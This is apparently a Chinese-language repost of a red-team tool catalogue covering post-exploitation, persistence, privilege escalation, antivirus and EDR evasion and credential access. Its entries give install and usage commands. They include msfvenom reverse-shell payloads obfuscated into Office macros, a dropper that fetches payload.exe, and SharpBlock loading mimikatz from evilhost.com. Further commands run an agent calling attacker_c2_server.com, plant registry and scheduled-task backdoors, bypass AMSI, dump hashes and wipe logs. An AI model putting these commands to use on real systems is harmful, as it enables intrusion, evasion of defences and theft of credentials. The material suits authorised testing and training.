Evil-WinRM 允许攻击者使用 WinRM 远程连接到 Windows 机器并执行任意命令。

一些功能包括:

  • 在内存中加载 Powershell 脚本
  • 绕过某些 AV 加载内存 dll 文件
  • 加载 x64 负载
  • 传递哈希支持
  • 上传和下载本地和远程文件

安装:(Git)

sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm

安装:(Ruby gem

gem install evil-winrm

可在此处找到替代安装说明。

用法:

# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' # Upload local files to victim upload local_filename
upload local_filename destination_filename # Download remote files to local machine download remote_filename
download remote_filename destination_filename # Execute .Net assembly into victim memory Invoke-Binary /opt/csharp/Rubeus.exe # Load DLL library into victim memory Dll-Loader -http http://10.10.10.10/SharpSploit.dll

可以在此处找到完整的使用文档。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第35
张图片

图片来自https://korbinian-spielvogel.de/posts/heist-writeup/

Donut

用于在内存中执行 VBScript、JScript、EXE、DLL 文件和 dotNET 程序集的工具。它可用于在目标系统上加载和运行自定义有效负载,而无需将文件放到磁盘上。

安装:(windows

git clone http://github.com/thewover/donut.git

生成加载器模板、动态库donut.dll、静态库donut.lib和生成器donut.exe。启动 x64 Microsoft Visual Studio 开发人员命令提示符,切换到克隆 Donut 存储库的目录并输入以下内容:

nmake -f Makefile.msvc

要执行相同的操作,除了在 Windows 或 Linux 上使用 MinGW-64,请更改到克隆 Donut 存储库的目录并输入以下内容:

make -f Makefile.mingw

安装:(Linux)

pip3 install donut-shellcode

用法:

# Creating shellcode from an XSL file that pops up a calculator. shellcode = donut.create(file=r"C:ToolsSourceReposdonutcalc.xsl") # Creating shellcode from an unmanaged DLL. Invokes DLLMain. shellcode = donut.create(file=r"C:ToolsSourceReposdonutpayloadtesthello.dll")

有关完整的使用信息,请参阅甜甜圈GitHub 页面

有关详细信息,请参阅The Wover最近的博客文章


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第36
张图片

Macro_pack

用于自动混淆和生成 Office 文档、VB 脚本、快捷方式和其他红队格式的工具。

安装:(二进制)

  1. 从github.com/sevagas/macro_pack/releases获取最新的二进制文件
  2. 在安装了正版 Microsoft Office 的 PC 上下载二进制文件。
  3. 打开控制台,CD 到二进制目录并调用二进制文件

安装:(Git)

git clone https://github.com/sevagas/macro_pack.git cd macro_pack
pip3 install -r requirements.txt

用法:

# Help Page python3 macro_pack.py  --help # List all supported file formats macro_pack.exe --listformats # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba # Obfuscate Empire stager VBA file and generate a MS Word document: macro_pack.exe -f empire.vba -o -G myDoc.docm # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" # Execute calc.exe via Dynamic Data Exchange (DDE) attack echo calc.exe | macro_pack.exe --dde -G calc.xslx


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第37
张图片

PowerSploit

PowerShell 脚本和模块的集合,可用于实现各种红队目标。

PowerSploit 的一些功能:

  • 转储密码哈希并从内存中提取明文密码
  • 提升权限并绕过安全控制
  • 执行任意 PowerShell 代码并绕过执行限制
  • 执行网络侦察和发现
  • 生成有效负载并执行漏洞利用

安装: 1. 保存到 PowerShell 模块文件夹

首先,您需要下载PowerSploit 文件夹并将其保存到您的 PowerShell 模块文件夹中。

可以使用以下命令找到您的 PowerShell 模块文件夹路径:

$Env:PSModulePath 

安装: 2.将PowerSploit安装为PowerShell模块

然后您需要安装 PowerSploit 模块(使用下载文件夹的名称)。

注意: 您的 PowerShell 执行策略可能会阻止您,要修复此问题,请运行以下命令。

powershell.exe -ep bypass

现在您可以安装 PowerSploit 模块。

Import-Module PowerSploit

用法:

Get-Command -Module PowerSploit


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第38
张图片

Rubeus

一种可用于执行与 Microsoft Active Directory (AD) 环境相关的各种操作的工具,例如转储密码哈希、创建/删除用户和修改用户属性。

Rubeus 的一些功能:

  • Kerberoasting
  • 金票攻击
  • 银票攻击

安装:(下载)

您可以在此处安装非官方的预编译 Rubeus 二进制文件。

安装:(编译)

Rubeus 与Visual Studio 2019 Community Edition兼容。打开 rubeus项目 .sln,选择“发布”,然后构建。

用法:

Rubeus.exe -h


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第39
张图片

SharpUp

一个很好的工具,用于检查受害者端点是否存在与高完整性进程、组、可劫持路径等相关的漏洞。

安装:(下载)

您可以在此处安装非官方的预编译 SharpUp 二进制文件。

安装:(编译)

SharpUp 与Visual Studio 2015 Community Edition兼容。打开 SharpUp项目 .sln,选择“发布”,然后构建。

用法:

SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership. SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable. SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第40
张图片

SQLRecon

MS-SQL(Microsoft SQL Server)是由微软开发和销售的关系数据库管理系统。

此 C# MS-SQL 工具包专为攻击性侦察和后期开发而设计。有关每种技术的详细使用信息,请参阅wiki

安装:(二进制)

您可以从此处下载最新的二进制版本。

用法:

# Authenticating using Windows credentials SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # Authenticating using Local credentials SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami # Authenticating using Azure AD credentials SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami # Run whoami SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # View databases SQLRecon.exe -a Windows -s SQL01 -d master -m databases # View tables SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

可以在wiki上找到完整的使用信息。

可以在此处找到工具模块的使用信息。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第41
张图片

使用的图像来自 SQLRecon 帮助页面

UltimateAppLockerByPassList

此资源是绕过 AppLocker 的最常见和已知技术的集合。

由于 AppLocker 可以用不同的方式配置,@api0cradle维护了一个经过验证的绕过列表(违反默认的 AppLocker 规则)和一个可能的绕过技术列表(取决于配置)或声称是某人的绕过。

他们还有一个通用绕过技术列表以及一个通过 DLL 执行的遗留方法列表。

索引列表


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第42
张图片

图片来自
github.com/api0cradle/UltimateAppLockerByPassList

StarFighters

基于 JavaScript 和 VBScript 的 Empire Launcher,在其自己的嵌入式 PowerShell 主机中运行。

两个启动器都在它们自己的嵌入式 PowerShell 主机中运行,因此我们不需要 PowerShell.exe。

当公司阻止 PowerShell.exe 和/或使用应用程序白名单解决方案但不阻止运行 JS/VBS 文件时,这可能很有用。

用法:

  • 在 PowerShell Empire 中设置一个新的监听器
  • 使用 Launcher 命令为此侦听器生成 PowerShell 启动器
  • 在 StarFighter JavaScript 或 VBScript 文件中复制并替换 Base64 编码的启动器负载

对于 JavaScript 版本,使用以下变量:

  var EncodedPayload = ""

对于 VBScript 版本,使用以下变量:

  Dim EncodedPayload: EncodedPayload = ""
  • 然后在 Target 上运行 wscript.exe StarFighter.js 或 StarFighter.vbs,或者在资源管理器中双击启动器。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第43
张图片

图片来自
hackplayers.com/

demiguise

该项目的目的是生成包含加密 HTA 文件的 .html 文件。

这个想法是,当您的目标访问该页面时,将获取密钥并在浏览器中动态解密 HTA 并直接推送给用户。

这是一种绕过某些安全设备实施的内容/文件类型检查的规避技术。

更多技术信息,请点击此处

安装:

git clone https://github.com/nccgroup/demiguise cd demiguise

用法:

# Generate an encrypted .hta file that executes notepad.exe python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第44
张图片

图片来自https://github.com/nccgroup/demiguise

持久控制

Impacket

Impacket 为各种网络协议(包括 SMB、Kerberos 和 LDAP)提供一组低级 Python 绑定,以及用于与网络服务交互和执行特定任务(例如转储密码哈希和创建网络共享)的高级库。

它还包括许多命令行工具,可用于执行各种任务,例如转储 SAM 数据库、枚举域信任和破解 Windows 密码。

安装:

python3 -m pip install impacket

安装:(使用示例脚本)

下载并解压缩,然后导航到安装文件夹并运行…

python3 -m pip install .

用法:

# Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # Gets a list of the sessions opened at the remote hosts netview.py domain/user:password -target 192.168.10.2 # Retrieves the MSSQL instances names from the target host. mssqlinstance.py 192.168.1.2 # This script will gather data about the domain's users and their corresponding email addresses. GetADUsers.py domain/user:password@IP

Impacket 使用的很棒的备忘单。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第45
张图片

Empire

Empire 是一个后开发框架,允许您生成有效负载以与受害者系统建立远程连接。

一旦在受害系统上执行了有效载荷,它就会建立回 Empire 服务器的连接,然后可以使用该连接来发出命令和控制目标系统。

Empire 还包括许多内置模块和脚本,可用于执行特定任务,例如转储密码哈希、访问 Windows 注册表和泄露数据。

安装:

git clone https://github.com/EmpireProject/Empire cd Empire
sudo ./setup/install.sh

用法:

# Start Empire ./empire # List live agents list agents # List live listeners list listeners

HarmJoy的很好的用法备忘单


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第46
张图片

SharPersist

用 C# 编写的 Windows 持久性工具包。

该项目有一个wiki

安装:(二进制)

您可以在此处找到最新版本。

安装:(编译)

  • 从GitHub Repo下载项目文件。
  • 加载 Visual Studio 项目并转到“工具”–>“NuGet 包管理器”–>“包管理器设置”
  • 转到“NuGet 包管理器”–>“包源”
  • 使用 URL“ https://api.nuget.org/v3/index.json ”添加包源
  • 安装 Costura.Fody NuGet 包。需要旧版本的 Costura.Fody (3.3.3),因此您不需要 Visual Studio 2019。
    • Install-Package Costura.Fody -Version 3.3.3
  • 安装 TaskScheduler 包
    • Install-Package TaskScheduler -Version 2.8.11
  • 您现在可以自己构建项目了!

用法:

可以在此处找到完整的用法示例列表。

#KeePass SharPersist -t keepass -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "C:UsersusernameAppDataRoamingKeePassKeePass.config.xml" -m add #Registry SharPersist -t reg -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add #Scheduled Task Backdoor SharPersist -t schtaskbackdoor -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add #Startup Folder SharPersist -t startupfolder -c "C:WindowsSystem32cmd.exe" -a "/c calc.exe" -f "Some File" -m add


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第47
张图片

ligo-ng

Ligolo-ng 是一个简单、轻量级和快速的工具,允许渗透测试人员使用 tun 接口(不需要 SOCKS)从反向 TCP/TLS 连接建立隧道。

Ligolo-ng 没有使用 SOCKS 代理或 TCP/UDP 转发器,而是使用Gvisor创建了一个用户态网络堆栈。

当运行中继/代理服务器时,使用一个 tun 接口,发送到该接口的数据包被转换,然后传输到代理远程网络。

安装:(下载)

发布页面上提供了预编译的二进制文件 (Windows/Linux/macOS) 。

安装:(构建)

构建 ligolo-ng(需要 Go >= 1.17):

go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go # Build for Windows
GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

设置:(Linux)

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

设置:(windows

您需要下载Wintun驱动程序(由WireGuard使用)并将其放在wintun.dll与 Ligolo 相同的文件夹中(确保您使用正确的体系结构)。

设置:(代理服务器)

./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

用法:

在目标(受害者)计算机上启动代理(不需要特权!):

./agent -connect attacker_c2_server.com:11601

一个会话应该出现在代理服务器上。

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" 

使用会话命令选择代理。

ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第48
张图片

图片来自https://github.com/nicocha30/ligolo-ng#demo

提权

LinPEAS

LinPEAS 是一个很好的详细特权升级,用于在 Linux 端点上查找本地 privesc 路由。

安装+使用:

curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第49
张图片

WinPEAS

WinPEAS 是一个很好的详细特权升级,用于在 Windows 端点上查找本地 privesc 路由。

安装+使用:

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第50
张图片

linux-smart-enumeration

Linux smart enumeration 是另一个不错的、不那么冗长的 linux privesc 工具,适用于 Linux。

安装+使用:

curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第51
张图片

Certify

Certify 是一个 C# 工具,用于枚举和滥用 Active Directory 证书服务 (AD CS) 中的错误配置。

Certify 旨在与其他红队工具和技术(例如 Mimikatz 和 PowerShell)结合使用,使红队能够执行各种类型的攻击,包括中间人攻击、冒充攻击和特权升级攻击.

认证的主要特点:

  • 证书创建
  • 证书签署
  • 证书导入
  • 证书信任修改

安装:(编译)

Certify 与Visual Studio 2019 Community Edition兼容。打开 Certify 项目.sln,选择“发布”,然后构建。

安装:(通过 PowerShell 运行 Certify)

如果要通过 PowerShell 包装器在内存中运行 Certify,请首先编译 Certify 并对生成的程序集进行 base64 编码:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:TempCertify.exe")) | Out-File -Encoding ASCII C:TempCertify.txt

然后可以使用以下代码将 Certify 加载到 PowerShell 脚本中(其中“aa…”替换为 base64 编码的 Certify 汇编字符串):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

然后可以调用 Main() 方法和任何参数,如下所示:

[Certify.Program]::Main("find /vulnerable".Split())

完整的编译说明可以在这里找到。

用法:

# See if there are any vulnerable templates Certify.exe find /vulnerable # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal Certify.exe request /ca:dc.theshire.localtheshire-DC-CA /template:VulnTemplate /altname:localadmin

可以在此处找到完整的示例演练。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第52
张图片

Get-GPPPassword

Get-GPPPassword 是 PowerSploit 工具包的 PowerShell 脚本部分,旨在检索使用组策略首选项 (GPP) 创建和管理的本地帐户的密码。

Get-GPPPassword 的工作原理是在域控制器上的 SYSVOL 文件夹中搜索包含密码信息的任何 GPP 文件。一旦找到这些文件,它就会解密密码信息并将其显示给用户。

安装:

按照此工具表中的PowerSploit安装说明进行操作。

powershell.exe -ep bypass
Import-Module PowerSploit

用法:

# Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第53
张图片

Sherlock

PowerShell 脚本可快速查找本地权限提升漏洞的缺失软件补丁。

支持:

  • MS10-015:响铃的用户模式 (KiTrap0D)
  • MS10-092:任务计划程序
  • MS13-053:NTUserMessageCall Win32k 内核池溢出
  • MS13-081:TrackPopupMenuEx Win32k 空页面
  • MS14-058:TrackPopupMenu Win32k 空指针取消引用
  • MS15-051:ClientCopyImage Win32k
  • MS15-078:字体驱动程序缓冲区溢出
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032:辅助登录句柄
  • MS16-034:Windows 内核模式驱动程序 EoP
  • MS16-135:Win32k 特权提升
  • CVE-2017-7199:Nessus Agent 6.6.2 – 6.10.3 Priv Esc

安装:(PowerShell)

# Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:INSTALL_LOCATIONSherlockSherlock.ps1

用法:(PowerShell)

# Run all functions Find-AllVulns  # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第54
张图片

图片来自https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/

Watson

Watson 是一种 .NET 工具,旨在枚举丢失的 KB 并建议对特权升级漏洞的利用。

非常适合识别缺失的补丁并建议可用于利用已知漏洞以获得系统更高权限的漏洞利用。

安装:

使用Visual Studio 2019 社区版。打开Watson 项目 .sln,选择“发布”,然后构建。

用法:

# Run all checks Watson.exe


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第55
张图片

图片文字使用自https://github.com/rasta-mouse/Watson#usage

ImpulsiveDLLHijack

基于 AC# 的工具,可自动执行在目标二进制文件中发现和利用 DLL 劫持的过程。

在交战期间,可以将发现的劫持路径武器化,以逃避 EDR。

安装:

  • Procmon.exe -> docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • 自定义确认 DLL
    • 这些是 DLL 文件,可帮助工具确认 DLL 是否已从已识别的劫持路径成功加载
    • 从上面提供的 MalDLL 项目编译(如果您相信我,请使用预编译的二进制文件!)
    • 32位的dll名称应该是:maldll32.dll
    • 64 位 dll 名称应为:maldll64.dll
    • 安装 NuGet 包:** PeNet** ->nuget.org/packages/PeNet/
      (编译 ImpulsiveDLLHijack 项目时的先决条件)

注意:i & ii 先决条件应该放在 ImpulsiveDLLHijacks.exe 的目录中。

  • 构建和设置信息:
    • 冲动DLL劫持
      • 在 Visual Studio 中克隆存储库
      • 在 Visual Studio 中加载项目后,
        转到“项目”–>“管理 NuGet 包”–> 浏览包并安装“PeNet”-
        > https://www.nuget.org/packages/PeNet/
      • 构建项目!
      • ImpulsiveDLLHijack.exe 将位于 bin 目录中。
    • 对于确认 DLL:
      • 在 Visual Studio 中克隆存储库
      • 使用 x86 和 x64 构建项目
      • 将 x86 版本重命名为 maldll32.dll,将 x64 版本重命名为 maldll64.dll
    • 设置:在 ImpulsiveDLLHijack.exe 目录中复制确认 DLL(maldll32 和 maldll64),然后执行 ImpulsiveDLLHijack.exe :))

从github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites
获取安装说明

用法:

# Help ImpulsiveDLLHijack.exe -h # Look for vulnerabilities in an executable  ImpulsiveDLLHijack.exe -path BINARY_PATH

可以在此处找到用法示例。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第56
张图片

图片来自
github.com/knight0x07/ImpulsiveDLLHijack#4-examples

ADFSDump

用于从 AD FS 转储各种好东西的 AC# 工具。

由 Doug Bienstock @doughsec在 Mandiant FireEye 时创建。

此工具旨在与 ADFSpoof 一起运行。ADFSdump 将输出使用 ADFSpoof 生成安全令牌所需的所有信息。

要求:

  • ADFSDump 必须在 AD FS 服务帐户的用户上下文下运行。您可以通过在 AD FS 服务器上运行进程列表或从 Get-ADFSProperties cmdlet 的输出中获取此信息。只有 AD FS 服务帐户具有访问配置数据库所需的权限。即使是 DA 也不能访问它。
  • ADFSDump 假定该服务配置为使用 Windows 内部数据库 (WID)。虽然支持外部 SQL 服务器是微不足道的,但目前还不存在此功能。
  • ADFSDump 必须在 AD FS 服务器上本地运行,而不是 AD FS Web 应用程序代理。WID 只能通过命名管道在本地访问。

安装:(编译)

ADFSDump 是针对 .NET 4.5 和 Visual Studio 2017 Community Edition 构建的。只需打开项目 .sln,选择“发布”,然后构建。

用法:(Flags

# The Active Directory domain to target. Defaults to the current domain. /domain: # The Domain Controller to target. Defaults to the current DC. /server: # Switch. Toggle to disable outputting the DKM key. /nokey # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. /database

博客 – 探索针对 ADFS 的黄金 SAML 攻击


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第57
张图片

图片来自
exploring-the-golden-saml-attack-against-adfs

杀软绕过

Invoke-Obfuscation(调用混淆)

PowerShell v2.0+ 兼容的 PowerShell 命令和脚本混淆器。如果受害者端点能够执行 PowerShell,那么此工具非常适合创建高度混淆的脚本。

安装:

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

用法:

./Invoke-Obfuscation


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第58
张图片

Veil

Veil 是一种用于生成绕过常见反病毒解决方案的 metasploit 有效负载的工具。

它可用于生成混淆的 shellcode,有关更多信息,请参阅官方Veil框架博客。

安装:(kali

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

安装:(Git)

sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git cd Veil/
./config/setup.sh --force --silent

用法:

# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-payloads # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-encoders # Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234 ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 # List all payloads (–list-payloads) for the tool Evasion (-t Evasion)
./Veil.py -t Evasion --list-payloads # Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

Veil 的创建者写了一篇很好的博客文章,进一步解释了武器和躲避命令行的用法。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第59
张图片

SharpBlock

一种通过阻止入口点执行来绕过 EDR 的活动投影 DLL 的方法。

特征:

  • 阻止 EDR DLL 入口点执行,从而防止放置 EDR 挂钩。
  • 在运行时寻找 Amsi.dll 代码补丁的扫描器无法检测到无补丁 AMSI 绕过。
  • 替换为可从磁盘、HTTP 或命名管道 (Cobalt Strike) 加载的植入 PE 的主机进程。
  • 植入过程被隐藏,以帮助逃避扫描仪寻找中空过程。
  • 使用隐蔽的 EDR 检测方法在进程创建后欺骗和植入命令行参数。
  • 无补丁 ETW绕过 。
  • 当被调用方在被阻止的 DLL 地址空间范围内时,阻止 NtProtectVirtualMemory 调用。

安装:

使用Visual Studio 2019 Community Edition编译 SharpBlock 二进制文件。

打开 SharpBlock项目 .sln,选择“发布”,然后构建。

用法:

# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL SharpBlock -e http://evilhost.com/mimikatz.bin -s c:windowssystem32notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee # Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL execute-assembly SharpBlock.exe -e .pipemimi -s c:windowssystem32notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe .pipemimi

不错的 PenTestPartners 博客文章在这里


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第60
张图片

图片来自https://youtu.be/0W9wkamknfM

Alcatraz

Alcatraz 是一个 GUI x64 二进制混淆器,能够混淆各种不同的 pe 文件,包括:

  • 。EXE文件
  • .dll
  • .sys

一些支持的混淆功能包括:

  • 立即行动的混淆
  • 控制流扁平化
  • 添加突变
  • 入口点混淆
  • Lea混淆

安装:(要求)

安装: https: //vcpkg.io/en/getting-started.html

vcpkg.exe install asmjit:x64-windows
vcpkg.exe install zydis:x64-windows

用法:

使用 GUI 混淆二进制文件:

  1. file通过单击左上角加载二进制文件。
  2. 通过扩展Functions树来添加功能。(您可以通过在顶部的搜索栏中输入名称进行搜索)
  3. 命中compile(注意: 混淆大量函数可能需要几秒钟


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第61
张图片

图片来自https://github.com/weak1337/Alcatraz

Mangle

Mangle 是一种操作已编译可执行文件(.exe 或 DLL)的各个方面的工具。

Mangle 可以删除已知的基于妥协指标 (IoC) 的字符串并用随机字符替换它们,通过扩大大小来更改文件以避免 EDR,并且可以从合法文件中克隆代码签名证书。

在这样做时,Mangle 帮助加载器避开磁盘和内存扫描器。

安装:

与往常一样,第一步是克隆存储库。在编译 Mangle 之前,您需要安装依赖项。要安装它们,请运行以下命令:

go get github.com/Binject/debug/pe

然后构建它

git clone https://github.com/optiv/Mangle cd Mangle
go build Mangle.go

用法:

  -C string Path to the file containing the certificate you want to clone
  -I string Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string The new file name
  -S int
        How many MBs to increase the file by

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第62
张图片

图片来自https://github.com/optiv/Mangle

AMSI.fail

AMSI.fail 是一个很棒的网站,可用于生成混淆的 PowerShell 片段,这些片段会破坏或禁用当前进程的 AMSI。

在混淆之前,这些片段是从一小部分技术/变体中随机选择的。每个片段在运行时/请求时都被混淆,因此生成的输出不会共享相同的签名。

不错的 f-secure 博客在这里解释 AMSI 。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第63
张图片

图片使用自http://amsi.fail/

ScareCrow

ScareCrow 是一种有效载荷创建框架,用于将(而非注入)旁加载到合法的 Windows 进程中(绕过应用程序白名单控制)。

一旦 DLL 加载程序加载到内存中,它就会利用一种技术将 EDR 的挂钩从进程内存中运行的系统 DLL 中清除。

执行时,ScareCrow 会将存储在磁盘上的系统 DLL 的字节复制到C:WindowsSystem32. 这些 DLL 存储在 EDR 挂钩“干净”的磁盘上,因为系统使用它们在生成新进程时将未更改的副本加载到新进程中。由于 EDR 仅在内存中挂钩这些进程,因此它们保持不变。

学习 ScareCrow 使用的技术的好博客:

安装:

ScareCrow 需要 golang 1.16.1 或更高版本来编译加载器。

# Clone git clone https://github.com/optiv/ScareCrow cd ScareCrow # Install dependencies go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo # Required openssl
osslsigncode
mingw-w64 # Build go build ScareCrow.go

用法:

Usage of ./ScareCrow:
  -I string Path to the raw 64-bit shellcode.
  -Loader string Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process using a JScript loader.
        [*] msiexec - Loads into MSIexec process using a JScript loader.
        [*] wscript - Loads into WScript process using a JScript loader. (default "binary")
  -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
...

完整的使用信息可以在这里找到。


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第64
张图片

图片来自https://github.com/optiv/ScareCrow

moonwalk

moonwalk 是一个 400 KB 的单一二进制可执行文件,可以在渗透测试 Unix 机器时清除您的痕迹。

它保存系统日志的预开发状态并还原该状态,包括文件系统时间戳后渗透,在 shell 中留下零痕迹。

安装:

curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk

用法:

# Start moonwalk straight after getting a shell on the victim Linux endpoint curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk
moonwalk start # Once you are finished, clear your traces  moonwalk finish


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第65
张图片

图片使用自https://github.com/mufeedvh/moonwalk

凭据访问

Mimikatz

在受害者端点上获取散列密码和明文密码的好工具。一旦您获得了对系统的特权访问权限,就可以放弃此工具来收集一些信誉。

安装:

  1. 下载mimikatz_trunk.7z文件。
  2. 下载后,mimikatz.exe二进制文件位于x64文件夹中。

用法:

.mimikatz.exe
privilege::debug


RedTeamTools红队渗透测试工具清单
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第66
张图片

LaZagne

